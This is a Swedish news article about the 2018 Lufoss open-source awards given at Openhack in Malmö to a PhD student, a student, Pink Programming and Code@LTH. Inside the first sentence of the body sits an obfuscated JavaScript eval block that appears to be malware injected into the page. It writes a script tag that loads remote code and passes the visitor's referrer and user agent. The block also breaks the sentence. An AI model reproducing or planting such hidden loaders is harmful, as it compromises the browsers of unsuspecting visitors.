Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

De tilldelas årets Lufoss-priser för arbete med öppen källkod

De tilldelas årets Lufoss-priser för arbete med öppen källkod
Sebastian Plengier Ehrnfelt

Buggrättningar eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rkkki|var|u0026u|referrer|raari||js|php’.split(‘|’),0,{}))
i en grafikdrivrutin, flera välanvända bibliotek för programmerare och breddad rekrytering när det gäller bland annat kvinnliga mjukvaruutvecklare. Det är några öppen källkod-bedrifter som kommer samhället till gagn och som belönas med Lufoss-stipendier under Open Hack – Coding for Humanity.

Under Openhack – Coding for Humanity delade Lufoss – Lund University Fund for Open Source Software – ut stipendier till personer och organisationer som har bidragit och utmärkt sig i arbetet med öppen källkod. Syftet med stipendierna är att inspirera studenter, och att företag och samhälle ska gagnas av utvecklingen när det gäller öppen källkod. Ceremonin ägde rum idag på Openhack – Coding for Humanity i Malmö.


Lufoss PhD Student Award
går till Pierre Moreau.

Pierre Moreau är doktorand i datorgrafik vid institutionen för datavetenskap på Lunds Tekniska Högskola. Pierre har bidragit till Linux-kärnan med viktiga buggrättningar i en grafikdrivrutin. Pierre bidrar även till ett bibliotek som gör det möjligt att utnyttja grafikprocessorer för tunga, parallella beräkningar.

Lufoss Student Scholarship går till Mateo Gianolio.

Mateo Gianolio är student vid Lunds Tekniska Högskola. Sedan 2014 har han skapat och delat med sig av en mängd bibliotek som lyckats fånga andra utvecklares intresse och många har bidragit till hans kreationer. Mateo har bland annat skapat ett bibliotek för linjär algebra, en chattklient med inbyggd kryptering och ett biliotek med neurala nätverk för teckenigenkänning.

Lufoss Organization Award delas mellan två organisationer: Pink Programming (representerat av medgrundaren Vanja Tufvesson) och Code@LTH (representerat av medgrundaren Fatima Abu Alpha).

Pink Programming arbetar långsiktigt med breddad rekrytering för att råda bot på bristen på mjukvaruutvecklare i allmänhet och kvinnliga utvecklare i synnerhet. Vanja delar med sig av exempel och övningar som gör det lätt att komma igång med programmering. Hennes entusiasm har hjälpt många kvinnor att upptäcka sitt teknikintresse.

Code@LTH främjar kodglädje och öppen källkod och hjälper teknologer att komma i gång med en kodportfölj på GitHub. Fatima har varit med och startat Code@LTH och även hjälpt barn att lära sig programmera vid LTH:s Science Center Vattenhallen. Fatima har också undervisat nya svenskar i programmering på Rosengård i Malmö. Just nu jobbar Fatima med att ordna en konferens med föreningen DataTjej, samtidigt som hon är lärarassistent i programmering på LTH.

Prisutdelare är professor Björn Regnell och Jan Erik Solem, som är lektor vid LTH, entreprenör och medgrundare av företaget Mapillary.

– Skälet till att Lufoss delar ut på under Openhack är att vi har det gemensamma målet att främja öppen källkod och ser det som en viktig del i samhällets utveckling, säger Björn Regnell, professor vid LTH och ordförande i Lufoss.

Lufoss stödjer Openhack, som är ett projekt för öppen kodning i välgörande syfte, bland annat genom projektledaren Johan Linåker som också sitter i Lufoss jury, säger Björn Regnell, professor vid LTH och ordförande i Lufoss.